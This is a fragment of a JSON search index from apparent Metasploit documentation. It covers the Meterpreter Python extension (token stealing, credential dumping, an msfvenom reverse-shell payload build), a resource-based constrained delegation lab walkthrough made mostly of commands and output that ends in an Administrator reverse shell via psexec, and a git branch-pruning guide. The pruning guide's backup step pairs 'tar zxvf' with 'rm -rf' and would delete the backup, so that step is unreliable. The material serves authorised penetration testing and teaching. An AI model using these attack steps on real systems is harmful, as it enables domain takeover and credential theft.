    "content": "This command allows for whole modules to be loaded from the attacker’s machine an uploaded to the target interpreter. The full help is shown below: . meterpreter &amp;gt; python_import -h Usage: python_import &amp;lt;-f file path&amp;gt; [-n mod name] [-r result var name] Loads a python code file or module from disk into memory on the target. The module loader requires a path to a folder that contains the module, and the folder name will be used as the module name. Only .py files will work with modules. OPTIONS: -f &amp;lt;opt&amp;gt; Path to the file (.py, .pyc), or module directory to import -h Help banner -n &amp;lt;opt&amp;gt; Name of the module (optional, for single files only) -r &amp;lt;opt&amp;gt; Name of the variable containing the result (optional, single files only) . Importing of module trees is still considered a beta feature, but we encourage you to use it where possible and keep us informed of any issues you may face. Consider the following script: . # $ cat /tmp/drives.py import string from ctypes import windll def get_drives(): drives = [] bitmask = windll.kernel32.GetLogicalDrives() for letter in string.uppercase: if bitmask &amp;amp; 1: drives.append(letter) bitmask &amp;gt;&amp;gt;= 1 return drives result = get_drives() print result . The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows: . meterpreter &amp;gt; python_import -f /tmp/drives.py [*] Importing /tmp/drives.py ... [+] Content written to stdout: ['A', 'C', 'D', 'Z'] . This shows that ctypes does indeed function correctly! . This command is also intended to allow for recursive loading of modules from the local attacker file system, however this feature is still not yet ready for prime time and work is still actively being done on this area. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_import",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_import"
  },"739": {
    "doc": "Python Extension",
    "title": "python_reset",
    "content": "It may get to a point where the content of the interpreter needs to be flushed. The python_reset command clears out all imports, libraries and global variables: . meterpreter &amp;gt; python_execute \"x = 100\" [+] Command executed without returning a result meterpreter &amp;gt; python_execute \"print x\" [+] Content written to stdout: 100 meterpreter &amp;gt; python_reset [+] Python interpreter successfully reset meterpreter &amp;gt; python_execute \"print x\" [-] Content written to stderr: Traceback (most recent call last): File \"&amp;lt;string&amp;gt;\", line 1, in &amp;lt;module&amp;gt; NameError: name 'x' is not defined . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_reset",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_reset"
  },"740": {
    "doc": "Python Extension",
    "title": "Meterpreter Bindings",
    "content": "A number of bindings are available to the Python extension that allow for interaction with the Meterpreter instance itself. They are broken up into logical modules based on the functionality that they provide. Bindings are available for other extensions as well, and hence in order to use them, those extensions must be loaded. If an extension is not present, and error is thrown. As soon as an extension is loaded, the function should work. Each of the following subsections shows a module namespace that must be imported for that module to function correctly. Binding list . meterpreter.elevate . | meterpreter.elevate.getsystem() - maps directly to the getsystem command, however only attempts to use technique 1 because this is the only technique that doesn’t require a binary to be uploaded. | meterpreter.elevate.rev2self() - maps directly to the rev2self command. | meterpreter.elevate.steal_token(pid) - provides the ability to steal a token from another process. | pid - the identifier of the process to steal the token from. | . | meterpreter.elevate.drop_token() - drops the token that was stolen using steal_token. | . meterpreter.extapi (requires the extapi extension) . Each of the following functions takes the following parameters: . | domain_name - the name of the domain that will be enumerated. | max_results - maximum number of results (default None). | page_size - the size of the results page (default None). | . The full list of available functions is as follows: . | meterpreter.extapi.adsi.enum_dcs(domain_name, max_results, page_size) - enumerate the domain controllers on the given domain. | meterpreter.extapi.adsi.enum_users(domain_name, max_results, page_size) - enumerate users on the given domain. | meterpreter.extapi.adsi.enum_group_users_nested(domain_name, group_dn, max_results, page_size) - enumerate users in the given group recursively. | group_dn - The distinguished name of the group to enumerate. | . | meterpreter.extapi.adsi.enum_computers(domain_name, max_results, page_size) - enumerate computers on the given domain. | meterpreter.extapi.adsi.domain_query(domain_name, query_filter, fields, max_results, page_size) - provides a generic query mechanism to ADSI. All other functions in this library make use of this function. | query_filter - the LDAP-formatted query filter for the query. | fields - list of fields to extract from the query results. | . | . meterpreter.fs . | meterpreter.fs.show_mount() - maps to the show_mount command and lists all logical drives on the target. | . meterpreter.incognito (requires the incognito extension) . | meterpreter.incognito.list_user_tokens() - list all available user tokens. | meterpreter.incognito.list_group_tokens() - list all available group tokens. | meterpreter.incognito.impersonate(user) - impersonate the given user. | user - name of the user/group to impersonate in DOMAIN\\user format. | . | meterpreter.incognito.snarf_hashes(server) - run the snarf_hashes functionality using the specified server. | server - name of the server that is in place and ready to snarf the hashes. | . | meterpreter.incognito.add_user(server, username, password) - add a user to the given server. | server - name of the server to use when adding the user. | username - name of the user to create. | password - password for the new user. | . | meterpreter.incognito.add_group_user(server, group, username) - add a user to a group (domain). | server - name of the server to use when adding the user to a group. | group - name of the group to add the user to. | username - name of the user to add to the group. | . | meterpreter.incognito.add_localgroup_user(server, group, username) - add a user to a group (local). | server - name of the server to use when adding the user to a group. | group - name of the group to add the user to. | username - name of the user to add to the group. | . | . meterpreter.kiwi (requires the kiwi extension) . | meterpreter.kiwi.creds_all() - matches the creds_all command from the kiwi extension and returns a full list of all credentials that can be pulled from memory. | . meterpreter.sys . | meterpreter.sys.info() - matches the sysinfo command and shows system information. | meterpreter.sys.ps_list() - matches the ps command and lists the processes on the target. | . meterpreter.transport . | meterpreter.transport.list() - list all transports in the target. | meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash) - allows for transports to be added to the Meterpreter session. All but the url parameter come with a sane default. Full details of each of these parameters can be found in the transport documentation. | . It is not possible to delete transports using the python extension as this opens the door to many kinds of failure. meterpreter.user . | meterpreter.user.getuid() - gets the UID of the current session. | meterpreter.user.getsid() - gets the SID of the current session. | meterpreter.user.is_system() - determines if the current session is running as the SYSTEM user. | . Bindings example . meterpreter &amp;gt; getuid Server username: WIN-TV01I7GG7JK\\oj meterpreter &amp;gt; python_execute \"import meterpreter.user; print meterpreter.user.getuid()\" [+] Content written to stdout: WIN-TV01I7GG7JK\\oj meterpreter &amp;gt; python_execute \"import meterpreter.elevate; meterpreter.elevate.getsystem()\" [+] Command executed without returning a result meterpreter &amp;gt; getuid Server username: NT AUTHORITY\\SYSTEM meterpreter &amp;gt; python_execute \"meterpreter.elevate.rev2self(); print meterpreter.user.getuid()\" [+] Content written to stdout: WIN-TV01I7GG7JK\\oj meterpreter &amp;gt; use incognito Loading extension incognito...success. meterpreter &amp;gt; python_execute \"import meterpreter.incognito; print meterpreter.incognito.list_user_tokens()\" [+] Content written to stdout: {'Delegation': ['NT AUTHORITY\\\\LOCAL SERVICE', 'NT AUTHORITY\\\\NETWORK SERVICE', 'NT AUTHORITY\\\\SYSTEM', 'WIN-TV01I7GG7JK\\\\oj'], 'Impersonation': ['NT AUTHORITY\\\\ANONYMOUS LOGON']} meterpreter &amp;gt; python_execute \"import meterpreter.fs; print meterpreter.fs.show_mount()\" [+] Content written to stdout: [{'Name': 'A:\\\\', 'SpaceUser': None, 'SpaceTotal': None, 'UNC': None, 'SpaceFree': None, 'Type': 2}, {'Name': 'C:\\\\', 'SpaceUser': 28950585344L, 'SpaceTotal': 64422408192L, 'UNC': None, 'SpaceFree': 28950585344L, 'Type': 3}, {'Name': 'D:\\\\', 'SpaceUser': None, 'SpaceTotal': None, 'UNC': None, 'SpaceFree': None, 'Type': 5}] . Each of the examples above just show the results printed to stdout, however the values are returned as Python dictionaries and can be operated on just like normal variables. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#meterpreter-bindings",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#meterpreter-bindings"
  },"741": {
    "doc": "Python Extension",
    "title": "Stageless Initialisation",
    "content": "Not only can the extension be baked into a stageless Meterpreter, like any other extension, it also has the ability to run an arbitrary script before the Meterpreter session is even established! Consider the following script: . $ cat /tmp/met.py import meterpreter.transport meterpreter.transport.add(\"tcp://127.0.0.1:8000\") . This is a simple script that uses the Meterpreter bindings to add a new transport to the list of transports. This is executed immediately before Meterpreter attempts to create a connection back to Metasploit for the first time. The intent is to show that it’s possible to add any number of transports on startup. To create a stageless payload that uses this script, we can make use of the EXTINIT parameter in msfvenom: . $ msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4445 EXTENSIONS=stdapi,priv,python EXTINIT=python,/tmp/met.py -f exe -o /tmp/met-stageless.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 6412437 bytes Saved as: /tmp/met-stageless.exe . When this payload is executed, the transport is added and shown to be present in the transport list immediately: . msf exploit(handler) &amp;gt; [*] Meterpreter session 2 opened (172.16.52.1:4445 -&amp;gt; 172.16.52.247:49159) at 2015-12-13 11:06:54 +1000 msf exploit(handler) &amp;gt; sessions -i -1 [*] Starting interaction with 2... meterpreter &amp;gt; transport list Session Expiry : @ 2015-12-20 11:06:52 ID Curr URL Comms T/O Retry Total Retry Wait -- ---- --- --------- ----------- ---------- 1 tcp://127.0.0.1:8000 300 3600 10 2 * tcp://172.16.52.1:4445 300 3600 10 . This stageless initialisation feature allows for long-running Python scripts to be run before Meterpreter even calls home. This is really handy in so many ways, so get creative and show us how awesome this can be. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#stageless-initialisation",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#stageless-initialisation"
  },"742": {
    "doc": "Python Extension",
    "title": "FAQ",
    "content": "Does the extension do dynamic resolution of Python libraries at runtime? . Yes. The extension has a built-in import handler that loads modules from memory. This includes modules that the user has dynamically loaded using the python_import command. If a module doesn’t exist as part of the extension then resolution will fail. Down the track we may look into extending this feature so that missing libraries are uploaded on-the-fly when an import fails, but it’s not known when this work will get done. When will this extension be available for other Meterpreters? . We’re not yet able to put a timeline on this. Is it possible to use the Python extension to run Responder? . Unfortunately, no it is not. Responder makes the assumption that port 445 is available for use on the target, which is why it functions nicely on *nix systems that don’t make use of this port by default. On Windows systems, port 445 is already in use by system services and hence can’t be bound to. There is a Powershell-based project that aims to do the same thing as Responder, and that is called Inveigh. This utility piggy-backs of the existing SMB service, and appears to do quite a good job of stealing hashes, so it’s recommended that this be used instead. Is it perfect? . Hell no! But the goal is to get closer and closer to perfect as we go. It’s up to you to help us improve it along the way by using it in interesting ways, and submitting bugs when it breaks. Can I suggest a feature? . Please do, making good use of the Github issues feature. Better still, create a PR for one! . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#faq",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#faq"
  },"743": {
    "doc": "Python Extension",
    "title": "Currently Loadable Native Libraries",
    "content": "__future__ __phello__ _abcoll _osx_support _pyio _strptime _threading_local _weakrefset abc aifc antigravity argparse asynchat asyncore atexit audiodev base64 BaseHTTPServer Bastion bdb binhex bisect calendar cgi CGIHTTPServer cgitb chunk cmd code codecs codeop collections colorsys commands compileall compiler compiler.ast compiler.consts compiler.future compiler.misc compiler.pyassem compiler.pycodegen compiler.symbols compiler.syntax compiler.transformer compiler.visitor ConfigParser contextlib Cookie cookielib copy copy_reg cProfile csv ctypes ctypes._endian ctypes.util ctypes.wintypes decimal difflib dircache dis DocXMLRPCServer dummy_thread dummy_threading email email._parseaddr email.base64mime email.charset email.encoders email.errors email.feedparser email.generator email.header email.iterators email.message email.parser email.quoprimime email.utils email.mime email.mime.application email.mime.audio email.mime.base email.mime.image email.mime.message email.mime.multipart email.mime.nonmultipart email.mime.text encodings encodings.aliases encodings.ascii encodings.base64_codec encodings.charmap encodings.cp037 encodings.cp1006 encodings.cp1026 encodings.cp1140 encodings.cp1250 encodings.cp1251 encodings.cp1252 encodings.cp1253 encodings.cp1254 encodings.cp1255 encodings.cp1256 encodings.cp1257 encodings.cp1258 encodings.cp424 encodings.cp437 encodings.cp500 encodings.cp720 encodings.cp737 encodings.cp775 encodings.cp850 encodings.cp852 encodings.cp855 encodings.cp856 encodings.cp857 encodings.cp858 encodings.cp860 encodings.cp861 encodings.cp862 encodings.cp863 encodings.cp864 encodings.cp865 encodings.cp866 encodings.cp869 encodings.cp874 encodings.cp875 encodings.hex_codec encodings.hp_roman8 encodings.idna encodings.iso8859_1 encodings.iso8859_10 encodings.iso8859_11 encodings.iso8859_13 encodings.iso8859_14 encodings.iso8859_15 encodings.iso8859_16 encodings.iso8859_2 encodings.iso8859_3 encodings.iso8859_4 encodings.iso8859_5 encodings.iso8859_6 encodings.iso8859_7 encodings.iso8859_8 encodings.iso8859_9 encodings.koi8_r encodings.koi8_u encodings.latin_1 encodings.mac_arabic encodings.mac_centeuro encodings.mac_croatian encodings.mac_cyrillic encodings.mac_farsi encodings.mac_greek encodings.mac_iceland encodings.mac_latin2 encodings.mac_roman encodings.mac_romanian encodings.mac_turkish encodings.mbcs encodings.palmos encodings.ptcp154 encodings.punycode encodings.quopri_codec encodings.raw_unicode_escape encodings.rot_13 encodings.string_escape encodings.tis_620 encodings.undefined encodings.unicode_escape encodings.unicode_internal encodings.utf_16 encodings.utf_16_be encodings.utf_16_le encodings.utf_32 encodings.utf_32_be encodings.utf_32_le encodings.utf_7 encodings.utf_8 encodings.utf_8_sig encodings.uu_codec encodings.zlib_codec filecmp fileinput fnmatch formatter fpformat fractions ftplib functools genericpath getopt getpass gettext glob gzip hashlib heapq hmac htmlentitydefs htmllib HTMLParser httplib ihooks imaplib imghdr importlib imputil inspect io json json.decoder json.encoder json.scanner json.tool keyword linecache locale logging logging.config logging.handlers macpath macurl2path mailbox mailcap markupbase md5 meterpreter meterpreter.core meterpreter.elevate meterpreter.fs meterpreter.incognito meterpreter.kiwi meterpreter.sys meterpreter.tlv meterpreter.transport meterpreter.user meterpreter.extapi meterpreter.extapi.adsi mhlib mimetools mimetypes MimeWriter modulefinder multifile multiprocessing multiprocessing.connection multiprocessing.forking multiprocessing.heap multiprocessing.managers multiprocessing.pool multiprocessing.process multiprocessing.queues multiprocessing.reduction multiprocessing.sharedctypes multiprocessing.synchronize multiprocessing.util multiprocessing.dummy multiprocessing.dummy.connection mutex netrc new nntplib ntpath nturl2path numbers opcode optparse os os2emxpath pdb pickle pickletools pipes pkgutil platform plistlib popen2 poplib posixfile posixpath pprint profile pstats py_compile pyclbr pydoc Queue quopri random re repr rexec rfc822 rlcompleter robotparser runpy sched sets sgmllib sha shelve shlex shutil SimpleHTTPServer SimpleXMLRPCServer site smtplib sndhdr socket SocketServer sre sre_compile sre_constants sre_parse ssl stat statvfs string StringIO stringold stringprep struct subprocess sunau sunaudio symbol symtable sysconfig tabnanny tarfile telnetlib tempfile textwrap this threading timeit toaiff token tokenize trace traceback types urllib urllib2 urlparse user UserDict UserList UserString uu uuid warnings wave weakref webbrowser whichdb wsgiref wsgiref.handlers wsgiref.headers wsgiref.simple_server wsgiref.util wsgiref.validate xdrlib xml xml.dom xml.dom.domreg xml.dom.expatbuilder xml.dom.minicompat xml.dom.minidom xml.dom.NodeFilter xml.dom.pulldom xml.dom.xmlbuilder xml.etree xml.etree.ElementInclude xml.etree.ElementPath xml.etree.ElementTree xml.parsers xml.sax xml.sax._exceptions xml.sax.handler xml.sax.saxutils xml.sax.xmlreader xmllib xmlrpclib zipfile . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#currently-loadable-native-libraries",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#currently-loadable-native-libraries"
  },"744": {
    "doc": "Python Extension",
    "title": "Python Extension",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html"
  },"745": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "RBCD Exploitation",
    "content": "If an account has the ability to write to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute against a target, i.e. having GenericWrite privileges, this can be abused for privilege escalation. The auxiliary/admin/ldap/rbcd module can be used to read and write the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute against a target for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry (ACE) to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. For privilege escalation - the auxiliary/admin/kerberos/get_ticket module can then be used to request a new Kerberos S4U impersonation ticket for the Administrator account. In order for the auxiliary/admin/ldap/rbcd module to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO). ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#rbcd-exploitation",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#rbcd-exploitation"
  },"746": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Lab setup",
    "content": "For the RBCD attack to work an Active Directory account (i.e. sandy) is required with write privileges to the target computer (i.e. WS01). From an admin powershell prompt, first create a new Active Directory account, sandy, in your Active Directory environment: . # Create a basic user account net user /add sandy Password1! # Mark the sandy and password as never expiring, to ensure the lab setup still works in the future net user sandy /expires:never Set-AdUser -Identity sandy -PasswordNeverExpires:$true . Grant Write privileges for sandy to the target machine, i.e. WS01: . # Remember to change WS01 to the name of your target Computer (i.e. the output of the hostname command) $TargetComputer = Get-ADComputer 'WS01' $User = Get-ADUser 'sandy' # Add GenericWrite access to the user against the target computer $Rights = [System.DirectoryServices.ActiveDirectoryRights] \"GenericWrite\" $ControlType = [System.Security.AccessControl.AccessControlType] \"Allow\" $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] \"All\" $GenericWriteAce = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $User.Sid,$Rights,$ControlType,$InheritanceType $TargetComputerAcl = Get-Acl \"AD:$($TargetComputer.DistinguishedName)\" $TargetComputerAcl.AddAccessRule($GenericWriteAce) Set-Acl -AclObject $TargetComputerAcl -Path \"AD:$($TargetComputer.DistinguishedName)\" . Finally Verify the Write privileges for the sandy account: . PS C:\\Users\\administrator&amp;gt; $TargetComputer = Get-ADComputer 'WS01' PS C:\\Users\\administrator&amp;gt; (Get-ACL \"AD:$($TargetComputer.DistinguishedName)\").Access| Where-Object { $_.IdentityReference -Match 'sandy' } ActiveDirectoryRights : GenericWrite InheritanceType : All ObjectType : 00000000-0000-0000-0000-000000000000 InheritedObjectType : 00000000-0000-0000-0000-000000000000 ObjectFlags : None AccessControlType : Allow IdentityReference : MSFLAB\\sandy IsInherited : False InheritanceFlags : ContainerInherit PropagationFlags : None . ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#lab-setup",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#lab-setup"
  },"747": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Module usage",
    "content": "The admin/dcerpc/samr_computer module is generally used to first create a computer account, which requires no permissions: . | From msfconsole | Do: use auxiliary/admin/dcerpc/samr_computer | Set the RHOSTS, SMBUser and SMBPass options a. For the ADD_COMPUTER action, if you don’t specify COMPUTER_NAME or COMPUTER_PASSWORD - one will be generated automatically b. For the DELETE_COMPUTER action, set the COMPUTER_NAME option c. For the LOOKUP_COMPUTER action, set the COMPUTER_NAME option | Run the module and see that a new machine account was added | . Then the auxiliary/admin/ldap/rbcd can be used: . | Set the RHOST value to a target domain controller | Set the USERNAME and PASSWORD information to an account with the necessary privileges | Set the DELEGATE_TO and DELEGATE_FROM data store options | Use the WRITE action to configure the target for RBCD | . See the Scenarios for a more detailed walk through . ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#module-usage"
  },"748": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Actions",
    "content": "FLUSH . Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just the matching ACEs. READ . Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD. REMOVE . Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs instead of deleting the entire security descriptor. WRITE . Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists. ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#actions",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#actions"
  },"749": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Options",
    "content": "DELEGATE_TO . The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated user must have write access to this object. DELEGATE_FROM . The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE) the delegation target. ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#options",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#options"
  },"750": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Scenarios",
    "content": "Window Server 2019 Domain Controller . In the following example the user MSFLAB\\sandy has write access to the computer account WS01$. The sandy account is used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account. The new computer account can then impersonate any user, including domain administrators, on WS01$ by authenticating with the Service for User (S4U) Kerberos extension. First create the computer account: . msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; show options Module options (auxiliary/admin/dcerpc/samr_computer): Name Current Setting Required Description ---- --------------- -------- ----------- COMPUTER_NAME no The computer name COMPUTER_PASSWORD no The password for the new computer RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Auxiliary action: Name Description ---- ----------- ADD_COMPUTER Add a computer account msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; set SMBUser sandy SMBUser =&amp;gt; sandy msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; set SMBPass Password1! SMBPass =&amp;gt; Password1! msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; run [*] Running module against 192.168.159.10 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB [+] 192.168.159.10:445 - Successfully created MSFLAB\\DESKTOP-QLSTR9NW$ [+] 192.168.159.10:445 - Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT [+] 192.168.159.10:445 - SID: S-1-5-21-3402587289-1488798532-3618296993-1655 [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/samr_computer) &amp;gt; use auxiliary/admin/ldap/rbcd . Now use the RBCD module to read the current value of msDS-AllowedToActOnBehalfOfOtherIdentity: . msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set USERNAME [email protected] BIND_DN =&amp;gt; [email protected] msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set PASSWORD Password1! BIND_PW =&amp;gt; Password1! msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set RHOSTS 192.168.159.10 RHOSTS =&amp;gt; 192.168.159.10 msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set DELEGATE_TO WS01$ DELEGATE_TO =&amp;gt; WS01$ msf6 auxiliary(admin/ldap/rbcd) &amp;gt; read [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. [*] Auxiliary module execution completed . Writing a new msDS-AllowedToActOnBehalfOfOtherIdentity value using the computer account created by admin/dcerpc/samr_computer: . msf6 auxiliary(admin/ldap/rbcd) &amp;gt; set DELEGATE_FROM DESKTOP-QLSTR9NW$ DELEGATE_FROM =&amp;gt; DESKTOP-QLSTR9NW$ msf6 auxiliary(admin/ldap/rbcd) &amp;gt; write [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. [*] Auxiliary module execution completed . Reading the value of msDS-AllowedToActOnBehalfOfOtherIdentity to verify the value is updated: . msf6 auxiliary(admin/ldap/rbcd) &amp;gt; read [*] Running module against 192.168.159.10 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local [*] Allowed accounts: [*] DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655) [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/rbcd) &amp;gt; . Next we can use the auxiliary/admin/kerberos/get_ticket module to request a new S4U impersonation ticket for the Administrator account using the previously created machine account. For instance requesting a service ticket for SMB access: . msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; run action=GET_TGS rhost=192.168.159.10 username=DESKTOP-QLSTR9NW password=A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT domain=msflab.local spn=cifs/ws01.msflab.local impersonate=Administrator [*] Running module against 192.168.159.10 [+] 192.168.159.10:88 - Received a valid TGT-Response [*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_533930.bin [*] 192.168.159.10:88 - Getting TGS impersonating [email protected] (SPN: cifs/ws01.msflab.local) [+] 192.168.159.10:88 - Received a valid TGS-Response [*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_962080.bin [+] 192.168.159.10:88 - Received a valid TGS-Response [*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin [*] Auxiliary module execution completed . The saved TGS can be used in a pass-the-ticket style attack. For instance using the exploit/windows/smb/psexec module for a reverse shell: . msf6 exploit(windows/smb/psexec) &amp;gt; run lhost=192.168.123.1 rhost=192.168.159.10 username=Administrator smb::auth=kerberos smb::rhostname=ws01.msflab.local domaincontrollerrhost=192.168.159.10 smbdomain=msflab.local smb::krb5ccname=/Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 192.168.159.10:445 - Connecting to the server... [*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'Administrator'... [*] 192.168.159.10:445 - Loaded a credential from ticket file: /Users/user/.msf4/loot/20230222095449_default_192.168.159.10_mit.kerberos.cca_614556.bin [*] 192.168.159.10:445 - Selecting PowerShell target [*] 192.168.159.10:445 - Executing the payload... [+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.159.10 [*] Meterpreter session 3 opened (192.168.123.1:4444 -&amp;gt; 192.168.159.10:60755) at 2023-02-22 10:00:01 +0000 meterpreter &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#scenarios"
  },"751": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Resource-based constrained delegation (RBCD)",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html"
  },"752": {
    "doc": "Remote Branch Pruning",
    "title": "Back up the repo",
    "content": "Clone a new metasploit-framework.git repository: . todb@presto:~/github/todb-r7$ git clone github_r7:rapid7/metasploit-framework.git msf-backup.git . Go there and check out every remote branch we’ve got. That way, if you screw up and delete something important, you can add it back in later from this backup clone. todb@presto:~/github/todb-r7$ cd msf-backup.git `todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v \"HEAD -&amp;gt; origin\" | sed 's/^ origin\\///'`; do git checkout -b $b --track origin/$b; done . Tarball it out of the way. todb@presto:~/github/todb-r7$ cd .. todb@presto:~/github$ tar zxvf msf-backup.git.tar.gz todb@presto:~/github$ rm -rf msf-backup.git . ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#back-up-the-repo",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#back-up-the-repo"
  },"753": {
    "doc": "Remote Branch Pruning",
    "title": "Make a new clone",
    "content": "Now, clone metasploit again. I do this because I have like 20 remotes to deal with on my “real” clone and I don’t want to have to grep through all my origin vs non-origin stuff. mazikeen:./rapid7$ git clone github_r7:rapid7/metasploit-framework.git msf-prune . Now start figuring out what branches to delete. First, wipe out anything that responds to prune. Usually that’s not a lot. mazikeen:./msf-prune$ git prune remote origin . Next, take a look at what’s already merged and what’s not. We can drop most of the merged stuff right away. mazikeen:./msf-prune$ git branch -r --merged mazikeen:./msf-prune$ git branch -r --no-merged . That gives a pretty good idea of how many branches we’re talking about. ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#make-a-new-clone",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#make-a-new-clone"
  },"754": {
    "doc": "Remote Branch Pruning",
    "title": "Start deleting old, merged branches",
